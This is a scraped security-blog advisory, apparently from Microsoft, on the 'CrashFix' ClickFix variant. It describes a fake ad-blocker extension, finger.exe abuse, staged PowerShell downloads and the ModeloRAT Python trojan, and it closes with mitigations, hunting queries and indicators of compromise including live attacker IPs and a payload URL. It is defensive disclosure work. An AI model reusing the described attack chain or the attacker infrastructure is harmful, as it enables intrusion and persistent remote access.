{“lastseen”:”2026-02-05T19:57:56″,”description”:”In January 2026, Microsoft Defender Experts identified a new evolution in the ongoing ClickFix campaign. This updated tactic deliberately crashes victims\u2019 browsers and then attempts to lure users into executing malicious commands under the pretext of restoring normal functionality.\\n\\nThis variant represents a notable escalation in ClickFix tradecraft, combining user disruption with social engineering to increase execution success while reducing reliance on traditional exploit techniques. The newly observed behavior has been designated _CrashFix_ , reflecting a broader rise in browser\u2011based social engineering combined with living\u2011off\u2011the\u2011land binaries and Python\u2011based payload delivery. Threat actors are increasingly abusing trusted user actions and native OS utilities to bypass traditional defences, making behaviour\u2011based detection and user awareness critical.\\n\\n# Technical Overview\\n\\n_Crashfix Attack life cycle_.\\n\\nThis attack typically begins when a victim searches for an ad blocker and encounters a malicious advertisement. This ad redirects users to the official Chrome Web Store, creating a false sense of legitimacy around a harmful browser extension. The extension impersonates the legitimate uBlock Origin Lite ad blocker to deceive users into installing it.\\n\\n**Sample Data:**\\n \\n \\n File Origin Referrer URL: https:\/\/chromewebstore.google[.]com\\n FileOriginURL: https:\/\/clients2[.]googleusercontent[.]com\/crx\/blobs\/AdNiCiWgWaD8B4kV4BOi-xHAdl_xFwiwSmP8QmSc6A6E1zgoIEADAFK6BjirJRdrSZzhbF76CD2kGkCiVsyp7dbwdjMX-0r9Oa823TLI9zd6DKnBwQJ3J_98pRk8vPDsYoHiAMZSmuXxBj8-Ca_j38phC9wy0r6JCZeZXw\/CPCDKMJDDOCIKJDKBBEIAAFNPDBDAFMI_2025_1116_1842_0.crx?authuser=0 \\n FileName: cpcdkmjddocikjdkbbeiaafnpdbdafmi_42974.crx\\n Folderpath: C:\\\\Users\\\\PII\\\\AppData\\\\Local\\\\Temp\\\\scoped_dir20916_1128691746\\\\cpcdkmjddocikjdkbbeiaafnpdbdafmi_42974.crx\\n SHA256: c46af9ae6ab0e7567573dbc950a8ffbe30ea848fac90cd15860045fe7640199c\\n \\n\\nUUID is transmitted to an attacker-controlled\u2011 typosquatted domain, www[.]nexsnield[.]com, where it is used to correlate installation, update, and uninstall activities.\\n\\nTo evade detection and prevent users from immediately associating the malicious browser extension with subsequent harmful behavior, the payload employs a delayed execution technique. Once activated, the payload causes browser issues only after a period, making it difficult for victims to connect the disruptions to the previously installed malicious extension.\\n\\nThe core malicious functionality performs a denial-of\u2011service attack against the victim\u2019s browser by creating an infinite loop. Eventually, it presents a fake _CrashFix_ security warning through a pop\u2011up window to further mislead the user.\\n\\n_Fake CrashFix Popup window_.\\n\\nA notable new tactic in this ClickFix variant is the misuse of the legitimate native Windows utility finger.exe, which is originally intended to retrieve user information from remote systems. The threat actors are seen abusing this tool by executing the following malicious command through the Windows dialog box.\\n\\n_Illustration of Malicious command copied to the clipboard_. _Malicious Clipboard copied Commands ran by users in the Windows dialog box_.\\n\\nThe native Windows utility finger.exe is copied into the temporary directory and subsequently renamed to ct.exe (**SHA\u2011256: beb0229043741a7c7bfbb4f39d00f583e37ea378d11ed3302d0a2bc30f267006**). This renaming is intended to obscure its identity and hinder detection during analysis.\\n\\nThe renamed ct.exe establishes a network connection to the attacker controlled\u2011 IP address 69[.]67[.]173[.]30, from which it retrieves a large charcode payload containing obfuscated PowerShell. Upon execution, the obfuscated script downloads an additional PowerShell payload, script.ps1 (**SHA\u2011256: \\nc76c0146407069fd4c271d6e1e03448c481f0970ddbe7042b31f552e37b55817**), from the attacker\u2019s server at 69[.]67[.]173[.]30\/b. The downloaded file is then saved to the victim\u2019s AppData\\\\Roaming directory, enabling further execution.\\n\\nObfuscated PowerShell commands downloading additional payload script.ps1.\\n\\nThe downloaded PowerShell payload, script.ps1, contains several layers of obfuscation. Upon de-obfuscation, the following behaviors were identified:\\n\\n * The script enumerates running processes and checks for the presence of multiple analysis or debugging tools such as Wireshark, Process Hacker, WinDbg, and others.\\n * It determines whether the machine is domain-joined, as\u2011 part of an environment or privilege assessment.\\n * It sends a POST request to the attacker controlled\u2011 endpoint 69[.]67[.]173[.]30, presumably to exfiltrate system information or retrieve further instructions.\\n\\nIllustration of Script-Based Anti-Analysis Behavior.\\n\\nBecause the affected host was domain-joined, the script proceeded to download a backdoor onto the device. This behavior suggests that the threat actor selectively deploys additional payloads when higher\u2011 value targets\u2014such as enterprise\u2011 joined\u2011 systems are identified.\\n\\nScript.ps1 downloading a WinPython package and a python-based payload for domain-joined devices.\\n\\nThe component WPy64\u201131401 is a WinPython package\u2014a portable Python distribution that requires no installation. In this campaign, the attacker bundles a complete Python environment as part of the payload to ensure reliable execution across compromised systems.\\n\\nThe core malicious logic resides in the modes.py file, which functions as a Remote Access Trojan (RAT). This script leverages pythonw.exe to execute the malicious Python payload covertly, avoiding visible console windows and reducing user suspicion.\\n\\nThe RAT, identified as ModeloRAT here, communicates with the attacker\u2019s command\u2011and\u2011control (C2) servers by sending periodic beacon requests using the following format:\\n\\nhttp:\/\/{C2_IPAddress}:80\/beacon\/{client_id}\\n\\n* * *\\n\\n`Illustration of ModeloRAT C2 communication via HTTP beaconing`.\\n\\nFurther establishing persistence by creating a Run registry entry. It modifies the python script\u2019s execution path to utilize pythonw.exe and writes the persistence key under:\\n\\nHKCU\\\\Software\\\\Microsoft\\\\Windows\\\\CurrentVersion\\\\Run \\nThis ensures that the malicious Python payload is executed automatically each time the user logs in, allowing the attacker to maintain ongoing access to the compromised system.\\n\\nThe ModeloRAT subsequently downloaded an additional payload from a Dropbox URL, which delivered a Python script named extentions.py. This script was executed using python.exe\\n\\nPython payload extension.py dropped via Dropbox URL.\\n\\nThe ModeloRAT initiated extensive reconnaissance activity upon execution. It leveraged a series of native Windows commands\u2014such as nltest, whoami, and net use\u2014to enumerate detailed domain, user, and network information.\\n\\nAdditionally, in post-compromise infection chains, Microsoft identified an encoded PowerShell command that downloads a ZIP archive from the IP address 144.31.221[.]197. The ZIP archive contains a Python-based payload (udp.pyw) along with a renamed Python interpreter (run.exe), and establishes persistence by creating a scheduled task named \u201cSoftwareProtection,\u201d designed to blend in as legitimate software protection service, and which repeatedly executes the malicious Python payload every 5 minutes.\\n\\n`PowerShell Script downloading and executing Python-based Payload and creating a scheduled task persistence`.\\n\\n## Mitigation and protection guidance\\n\\n * Turn on cloud-delivered protection in Microsoft Defender Antivirus or the equivalent for your antivirus product to cover rapidly evolving attacker tools and techniques. Cloud-based machine learning protections block a majority of new and unknown variants. \\n * Run endpoint detection and response (EDR) in block mode so that Microsoft Defender for Endpoint can block malicious artifacts, even when your non-Microsoft antivirus does not detect the threat or when Microsoft Defender Antivirus is running in passive mode. EDR in block mode works behind the scenes to help remediate malicious artifacts that are detected post-breach. \\n * As a best practice, organizations may apply network egress filtering and restrict outbound access to protocols, ports, and services that are not operationally required. Disabling or limiting network activity initiated by legacy or rarely used utilities, such as the finger utility (TCP port 79), can help reduce the surface attack and limit opportunities for adversaries to misuse built-in system tools.\\n * Enable network protection in Microsoft Defender for Endpoint. \\n * Turn on web protection in Microsoft Defender for Endpoint. \\n * Encourage users to use Microsoft Edge and other web browsers that support SmartScreen, which identifies and blocks malicious websites, including phishing sites, scam sites, and sites that contain exploits and host malware. \\n * Enforce MFA on all accounts, remove users excluded from MFA, and strictly require MFA from all devices, in all locations, at all times. \\n * Remind employees that enterprise or workplace credentials should not be stored in browsers or password vaults secured with personal credentials. Organizations can turn off password syncing in browser on managed devices using Group Policy. \\n * Turn on the following attack surface reduction rules to block or audit activity associated with this threat: \\n * Block executable files from running unless they meet a prevalence, age, or trusted list criterion\\n * You can assess how an attack surface reduction rule might impact your network by opening the security recommendation for that rule in Vulnerability management. In the Recommendation details pane, check the user impact to determine what percentage of your devices can accept a new policy enabling the rule in blocking mode without adverse impact to user productivity.\\n\\n\\n\\n## Microsoft Defender XDR detections \\n\\nMicrosoft Defender XDR customers can refer to the list of applicable detections below. Microsoft Defender XDR coordinates detection, prevention, investigation, and response across endpoints, identities, email, and apps to provide integrated protection against attacks like the threat discussed in this blog.\\n\\nCustomers with provisioned access can also use Microsoft Security Copilot in Microsoft Defender to investigate and respond to incidents, hunt for threats, and protect their organization with relevant threat intelligence.\\n\\n**Tactic** | **Observed activity** | **Microsoft Defender coverage** \\n—|—|— \\n Execution| – Execution of malicious python payloads using Python interpreter – Scheduled task process launched| **Microsoft Defender for Endpoint** – Suspicious Python binary execution**** – Suspicious scheduled Task Process launched \\n Persistence | – Registry Run key Created| **Microsoft Defender for Endpoint** – Anomaly detected in ASEP registry \\nDefense Evasion| – Scheduled task created to mimic \\u0026 blend in as legitimate software protection service | **Microsoft Defender for Endpoint** – Masqueraded task or service \\nDiscovery| – Queried for installed security products. – Enumerated users, domain, network information| **Microsoft Defender for Endpoint** – Suspicious security software Discovery – Suspicious Process Discovery – Suspicious LDAP query \\nExfiltration| – Finger Utility used to retrieve malicious commands from attacker-controlled servers| **Microsoft Defender for Endpoint** – Suspicious use of finger.exe**** \\nMalware| – Malicious python payload observed| **Microsoft Defender for Endpoint** – Suspicious file observed**** \\n \\n## Threat intelligence reports\\n\\nMicrosoft customers can use the following reports in Microsoft products to get the most up-to-date information about the threat actor, malicious activity, and techniques discussed in this blog. These reports provide intelligence, protection information, and recommended actions to prevent, mitigate, or respond to associated threats found in customer environments.\\n\\n## Microsoft Defender XDR\\n\\n### Hunting queries \\n\\nMicrosoft Defender XDR customers can run the following queries to find related activity in their environment:\\n\\n**Use the below query to identify the presence of Malicious chrome Extension**\\n \\n \\n DeviceFileEvents\\n | where FileName has \\”cpcdkmjddocikjdkbbeiaafnpdbdafmi\\”\\n \\n\\n**Identify the malicious to identify Network connection related to Chrome Extension**\\n \\n \\n DeviceNetworkEvents\\n | where RemoteUrl has_all (\\”nexsnield.com\\”)\\n \\n\\n**Use the below query to identify the abuse of LOLBIN Finger.exe**\\n \\n \\n DeviceProcessEvents\\n | where InitiatingProcessCommandLine has_all (\\”cmd.exe\\”,\\”start\\”,\\”finger.exe\\”,\\”ct.exe\\”) or ProcessCommandLine has_all (\\”cmd.exe\\”,\\”start\\”,\\”finger.exe\\”,\\”ct.exe\\”)\\n | project-reorder Timestamp,DeviceId,InitiatingProcessCommandLine,ProcessCommandLine,InitiatingProcessParentFileName\\n \\n\\n**Use the below query to Identify the network connection to malicious IP address**\\n \\n \\n DeviceNetworkEvents\\n | where InitiatingProcessCommandLine has_all (\\”ct.exe\\”,\\”confirm\\”)\\n | distinct RemoteIP\\n | join kind=inner DeviceNetworkEvents on RemoteIP\\n )\\n | project Timestamp, DeviceId, DeviceName, RemoteIP, RemoteUrl, InitiatingProcessCommandLine, InitiatingProcessParentFileName\\n \\n\\n**Use the below query to identify the network connection to Beacon IP address**\\n \\n \\n DeviceNetworkEvents\\n | where InitiatingProcessCommandLine has_all (\\”pythonw.exe\\”,\\”modes.py\\”)\\n | where RemoteIP !in (\\”\\”, \\”127.0.0.1\\”)\\n | project-reorder Timestamp, DeviceName,DeviceId,TenantId,OrgId,RemoteUrl,InitiatingProcessCommandLine,InitiatingProcessParentFileName\\n \\n\\n**Use the below query to identify the Registry RUN persistence**\\n \\n \\n DeviceRegistryEvents\\n | where InitiatingProcessCommandLine has_all (\\”pythonw.exe\\”,\\”modes.py\\”)\\n \\n\\n**Use the below query to identify the scheduled task persistence**\\n \\n \\n DeviceEvents\\n | where ActionType == \\”ScheduledTaskCreated\\”\\n | where InitiatingProcessCommandLine has_all (\\”run.exe\\”, \\”udp.pyw\\”)\\n \\n\\n## Indicators of compromise\\n\\n**Indicator**| **Type**| **Description** \\n—|—|— \\nnexsnield[.]com| URL| Malicious Browser extension communicating with the attacker-controlled domain \\n69[.]67[.]173[.]30| IP Address| Attacker-controlled infrastructure retrieving malicious commands and additional payloads \\n144[.]31[.]221[.]197| IP Address| Attacker-controlled infrastructure retrieving malicious commands and additional payloads \\n199[.]217[.]98[.]108| IP Address| Attacker-controlled infrastructure retrieving malicious commands and additional payloads \\n144[.]31[.]221[.]179| IP Address| Attacker-controlled infrastructure downloading malicious commands and additional payloads \\nhxxps[:]\/\/www[.]dropbox[.]com\/scl\/fi\/znygol7goezlkhnwazci1\/a1.zip| URL| Adversary hosted python payload \\n158[.]247[.]252[.]178| IP Address| ModeloRAT C2 Server \\n170[.]168[.]103[.]208| IP Address| ModeloRAT C2 Server \\nc76c0146407069fd4c271d6e1e03448c481f0970ddbe7042b31f552e37b55817| SHA-256| Second stage PowerShell payload \u2013 Script.ps1 \\nc46af9ae6ab0e7567573dbc950a8ffbe30ea848fac90cd15860045fe7640199c \\n \\n01eba1d7222c6d298d81c15df1e71a492b6a3992705883c527720e5b0bab701a \\n \\n6f7c558ab1fad134cbc0508048305553a0da98a5f2f5ca2543bc3e958b79a6a3 \\n \\n3a5a31328d0729ea350e1eb5564ec9691492407f9213f00c1dd53062e1de3959 \\n \\n6461d8f680b84ff68634e993ed3c2c7f2c0cdc9cebb07ea8458c20462f8495aa \\n \\n37b547406735d94103906a7ade6e45a45b2f5755b9bff303ff29b9c2629aa3c5| SHA-256| Malicious Chrome Extension \\n \\n## Microsoft Sentinel\\n\\nMicrosoft Sentinel customers can use the TI Mapping analytics (a series of analytics all prefixed with \u2018TI maps) to automatically match the malicious domain indicators mentioned in this blog post with data in their workspace. If the TI Map analytics are not currently deployed, customers can install the Threat Intelligence solution from the Microsoft Sentinel Content Hub to have the analytics rule deployed in their Sentinel workspace.\\n\\n## References\\n\\n * https:\/\/www.huntress.com\/blog\/malicious-browser-extention-crashfix-kongtuke\\n\\n\\n\\n_This research is provided by Microsoft Defender Security Research with contributions from Sai Chakri Kandalai and Kaustubh Mangalwedhekar_.\\n\\n## **Learn more **** ** \\n\\nReview our documentation to learn more about our real-time protection capabilities and see how to enable them within your organization. \\n\\nLearn more about securing Copilot Studio agents with Microsoft Defender \\n\\nLearn more about Protect your agents in real-time during runtime (Preview) \u2013 Microsoft Defender for Cloud Apps | Microsoft Learn \\n\\nExplore how to build and customize agents with Copilot Studio Agent Builder \\n\\nThe post New Clickfix variant \u2018CrashFix\u2019 deploying Python Remote Access Trojan appeared first on Microsoft Security Blog.”,”published”:”2026-02-05T18:51:39″,”modified”:”2026-02-05T18:51:39″,”type”:”mssecure”,”title”:”New Clickfix variant \u2018CrashFix\u2019 deploying Python Remote Access Trojan”,”source”:””,”references”:””,”id”:”MSSECURE:A3DAD4B8A81AE9C9C31F7973ECA5B311″,”bulletinFamily”:”blog”,”cwe”:null,”cvelist”:[],”sourceData”:””,”sourceHref”:””,”cvss”:{“score”:0,”severity”:”NONE”,”vector”:”NONE”,”version”:”NONE”},”cvss2″:{},”cvss3″:{“version”:””,”vectorString”:””,”baseScore”:0,”baseSeverity”:””,”attackVector”:””,”attackComplexity”:””,”privilegesRequired”:””,”userInteraction”:””,”scope”:””,”confidentialityImpact”:””,”integrityImpact”:””,”availabilityImpact”:””,”cvssV3″:{“version”:””,”vectorString”:””,”baseScore”:0,”baseSeverity”:””,”attackVector”:””,”attackComplexity”:””,”privilegesRequired”:””,”userInteraction”:””,”scope”:””,”confidentialityImpact”:””,”integrityImpact”:””,”availabilityImpact”:””}},”href”:”https:\/\/www.microsoft.com\/en-us\/security\/blog\/2026\/02\/05\/clickfix-variant-crashfix-deploying-python-rat-trojan\/”,”category_name”:”News”,”post_link”:””,”product”:””,”version”:””,”vendor”:””,”ai_description”:””,”ai_severity”:””,”ai_vendor”:””,”ai_product”:””,”ai_version”:””,”ai_score”:0}<\/p>\n","protected":false},"excerpt":{"rendered":"
{“lastseen”:”2026-02-05T19:57:56″,”description”:”In January 2026, Microsoft Defender Experts identified a new evolution in the ongoing ClickFix campaign. This updated tactic deliberately crashes victims\u2019 browsers and then attempts…<\/p>\n","protected":false},"author":1,"featured_media":0,"comment_status":"open","ping_status":"open","sticky":false,"template":"","format":"standard","meta":{"footnotes":""},"categories":[4],"tags":[6,8,12,110,13,33,7,11,5],"class_list":["post-39281","post","type-post","status-publish","format-standard","hentry","category-category_news","tag-cve","tag-cvss","tag-exploit","tag-mssecure","tag-news","tag-none","tag-security","tag-tapic","tag-vulnerability"],"yoast_head":"\n